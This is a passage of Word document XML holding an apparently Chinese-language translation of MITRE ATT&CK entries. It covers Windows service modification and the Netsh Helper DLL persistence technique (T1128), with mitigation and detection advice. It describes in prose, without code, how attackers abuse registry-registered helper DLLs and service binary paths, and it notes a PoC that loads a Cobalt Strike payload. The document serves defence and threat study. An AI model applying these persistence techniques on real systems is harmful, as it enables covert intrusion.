        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3114"/>
        <w:gridCol w:w="6622"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00557D03" w14:paraId="6C4E73BB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A2CA481" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6622" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4DAFCCBE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00557D03" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00557D03">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4CDC4AF7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BABD8E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F06A45C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用审核</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>企业系统中权限和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>服务滥用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>情况并对检测到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的情况进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>纠正。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="75460D3C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A34D500" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>账号管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17DC30BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制用户账号和组的权限，以便只有授权管理员才能与服务更改和服务配置进行交互。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B76A372" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31690E94" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26610627" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找与已知软件、补丁周期等无关的服务注册表项更改。把二进制路径和服务启动类型从手动或禁用更改为自动（如果通常不这样做）的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>行为是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335DD75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务信息存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的注册表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747DC2CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能够通过命令行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改服务的工具可能不常见，具体取决于系统在特定环境中的使用方式。收集服务实用程序执行信息和服务二进制路径参数，用于分析。甚至</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务二进制路径以执行命令或脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6D82A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从已知服务中查找异常进程调用树来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与发现操作或其他攻击技术相关的其他命令的执行。还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来修改服务。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通过此</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>修改服务，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能还需要配置日志功能以收集适当数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF84D1" w14:textId="374BF460" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Netsh</w:t>
      </w:r>
      <w:r w:rsidR="00DF3A3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Helper DLL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="46B871B2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5743A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1128</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACB5614" w14:textId="5BFF8FF7" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B21322" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B94DF56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>[netsh](https://attack.mitre.org/software/S0108)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0948B3DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45292C62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5798722F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Matthew Demaske</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Adaptforward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6152F6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CEE9AB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B1811E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行脚本实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（也称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Netshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）用于与系统网络配置交互。它包含添加辅助动态链接库以扩展实用程序功能的功能。已注册的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>辅助程序动态链接库的路径输入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Netsh</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB34FAA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当使用其它持久性技术自动执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者在执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的系统上存在其他持久软件时，攻击者可能会使用带有辅助动态链接库的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以持久方式代理执行任意代码。比如，调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603F895" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>证明，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>辅助程序动态链接库加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cobalt Strike</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的有效负载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11646571" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53945686" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC82E8A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE5880" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在大多数环境中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拥有任何子进程都可能是不寻常的。监控进程执行并调查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netsh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>恶意行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的子进程。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Netsh</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件或良性软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的任何新条目或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑条目</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985DD6D" w14:textId="374CFA32" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="0034643E" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
